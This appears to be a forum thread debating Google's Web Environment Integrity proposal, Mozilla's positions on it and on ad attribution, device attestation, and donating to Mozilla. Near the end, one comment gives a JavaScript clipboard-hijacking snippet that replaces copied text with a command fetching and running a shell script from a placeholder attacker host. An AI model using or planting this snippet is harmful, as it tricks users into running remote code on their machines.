3. Advertising clients survey users at checkout to ask whether they found the product/service from an advert, or whether they recall seeing an advertising campaign and where they remember seeing it.

4. Advertising clients host advertisements at ads.company.example (in a few highly restricted formats) so they can keep track of impressions themselves.

5. (still a bad idea, based on user surveys, but one which Google et al should have considered for minimisation of data collection and privacy impact) Browsers collect advertising metrics during use and when a user makes a transaction at an online store, the online store asks the user (via the browser) for permission to obtain those saved advertising metrics to provide only to the online store. Users can review the entirety of information sent to the online store before it is sent. Advertising networks don't have a need to access browsing history for everyone on the Internet in real time.

6. Online stores and similar continue to rotate their marketing spend through various advertising networks and marketing campaigns, checking their own metrics to see if advertising campaigns have been having an impact. Campaigns could include marketing using the Internet but outside the reach of Google et al such as use of campaign-specific coupons and products marketed through product review websites, referral schemes, influencers, etc.

2. Great, they should do that, but good luck doing that when the data you need to audit is on a bajillion client machines.

3. People do that already

4. This became a thing a while back as a way to defeat third-party tracking blockers in browsers

5. This is literally the attribution system you're arguing against

6. They do that already. But good luck finding an ad marketplace that Google and Facebook don't have their fingers already in.

Also...

> What prevents any of the following solutions from providing assurance to advertising clients, without also destroying the Internet and general purpose computing

I was replying to a comment asking why Mozilla supports Interoperable Private Attribution (IPA). None of what I said should be taken as support for Web Integrity, which is cancer.

[1] https://github.com/mozilla/standards-positions/issues/753

[2] https://github.com/WebKit/standards-positions/issues/142

Additionally, AntiFraudCG proposals such as WEI focus on benefits they provide to PATCG proposals. For example, a Googler with historical interest in minimising inflated view counts on YouTube[4] (a benefit to YouTube's advertisers) wrote earlier this year a proposal to AntiFraudCG including:

"By transmitting signals of legitimacy from the device’s platform, such as if the device is emulated or rooted, publishers and their technology partners could use this information in part to determine if traffic is invalid. They could then choose appropriate actions like flagging advertising actions as suspicious"[5]

[1] https://github.com/patcg

[2] https://github.com/antifraudcg

[3] https://www.mozilla.org/en-US/mission/

[4] https://security.googleblog.com/2014/02/keeping-youtube-view...

[5] https://github.com/antifraudcg/proposals/issues/8

- OP responds with “what about IPA”

It's litteral whataboutism.

I'm sure OP is glad that Mozilla takes a negative position on WEI, but when they take other positions simultaneously that seem to counter their WEI positioning, that is a legitimate criticism. I share in that view.

I'm glad to see Mozilla push back in a case like this, but they need to do more, and more consistently so.

Were you expecting only responses of praise for Mozilla, that users have been heard on WEI and therefore everyone can move on? Mozilla has invested resources together with Meta into developing the IPA proposal that also prioritises the needs of advertisers over users. The problem that IPA seeks to solve is:

  "Advertisers need accurate reporting about how their ad campaigns are performing. Currently, businesses use data about the people who viewed their ads and bought their products to determine ‘return on ad spend’. But the ecosystem is moving towards more privacy and less personal data sharing."[1]

  "Detecting fraud and invalid traffic is a challenging problem that we're interested in helping address."

A further error of your framing is assuming WEI and IPA proposals can be meaningfully discussed in isolation of each other. With such framing, there is an avoidance of discussion of the combined impact of proposals if they were implemented together, or whether proposals such as IPA still make sense to pursue without WEI (or future equivalent proposal).

[1] https://docs.google.com/presentation/d/1NpQz0Wm73eEKw24V7B0y...

[2] https://www.rfc-editor.org/rfc/rfc8890.html

[3] https://www.w3.org/TR/design-principles/#priority-of-constit...

[4] https://www.w3.org/TR/ethical-web-principles/#control, https://www.w3.org/TR/ethical-web-principles/#multi, https://www.w3.org/TR/ethical-web-principles/#render

[5] https://en.wikipedia.org/wiki/Whataboutism#Defense

...if you let it.

How to design a website that is not accesible with Chrome. As a means of protest by certain website operators.

Would be fun to watch Google circumvent that. Especially if it was only popular amongst small, noncommercial websites.

But rather than block them outright, I would disable all but the necessarily features snd keep reminding those users to either switch to another browser or to use something like tampermonkey (with clear instructions in what it needs to do).

What would be a good way to detect support for this stuff? The js api?

Happy to say, Google just fixed it (about 4 months ago).

Many free cross-browser testing tools still can demonstrate the breakage (via version testing).

We should start to orient the debate instead on the security issues created by Google and their ads.

Google should be split so that the interests of Google'd not taint Android and Chrome.

That's exactly the thing, this integrity api only means the deviced is controlled, not secure, that's two very different things. You can have a phone riddled with pre-installed malware passing the safety net and you can have EOS, the cleanest rom that I know about which can fail it.

I'd love to donate to Mozilla, but I'm concerned my money could just end up in some C-suite pockets if I do. Is there a way to donate specifically to Firefox core(-ish) team, and maybe also MDN?

For a "fun" example of how strict budget destination restrictions fail, take a look at Atlanta's MARTA, that used to have a fixed 50/50 budget split between OPEX and CAPEX by it's funding law, and therefore had brand new trains but everything else falling apart.

However, dollars are fungible. If you donate $500 to support MDN, that may replace $500 for MDN coming from revenue, which frees up $500 to go into something else, like a C-Suite's pocket, or Pocket or whatever. So while your dollars go where you said, it still enables whatever you didn't like. OTOH, if you donate $50B to support MDN, that's a bit different; it certainly frees up whatever money was going to support MDN before, but there wasn't $50B of MDN expense, so the excess beyond the needs of MDN doesn't go anywhere.

At the end of the day, users will just see that a website works in Chrome and not in Firefox. Firefox will decide that there is no point in apposing it if there is a real cost in potential market-share.

Remind me, how has that strategy worked out for their market share? Perhaps the market for I-Can't-Believe-It's-Not-Chrome isn't actually that big since those users don't have a problem with just using Chrome.

https://webkit.org/standards-positions/

(this one has not landed yet, likely to be opposed as well)

The goal of device attestation for consumer software is to put an end to that. Originally pioneered by Apple on iOS, now making its way to all of computing thanks to the forces of capitalism, device attestation means that the hackers lose. It is the bad ending.

The other twin threat, and I hate to say it, is the software industry sorting its security story out. In the past iOS jailbreaks used to be common, but there hasn't been an iOS jailbreak in a year. Rust isn't helping.

We are hurtling towards a world where producers and IP holders have complete control over the content they produce, and use leading-edge cryptography and ultra-secure consumer-hostile software to keep it that way. This is one of the most dangerous developments to ever happen in all of history, and once it's real there's no going back.

Stallman was right.

It's not really optional. At least, not unless you consider online banking to be optional.

Website owners get protected from an ever increasing amount of malicious content. Now nearly impossible to detect thanks to LLMs. In theory you should be able to see the appeal that has.

Imagine we fully loose the web because iOS opens up.

We may all end up stuck using a German VPN so we can still use ad blockers.

Who? Oh you mean digg v3?

Who's digg? Exactly....

Basic malware JavaScript snippet:

    <script>
    document.getElementById('copy').addEventListener('copy', function(e) {
        e.clipboardData.setData('text/plain', 
        'curl http://attacker-domain:8000/shell.sh | sh\n'); e.preventDefault();
     });
     </script>

No fear, there.

No need for all that other things.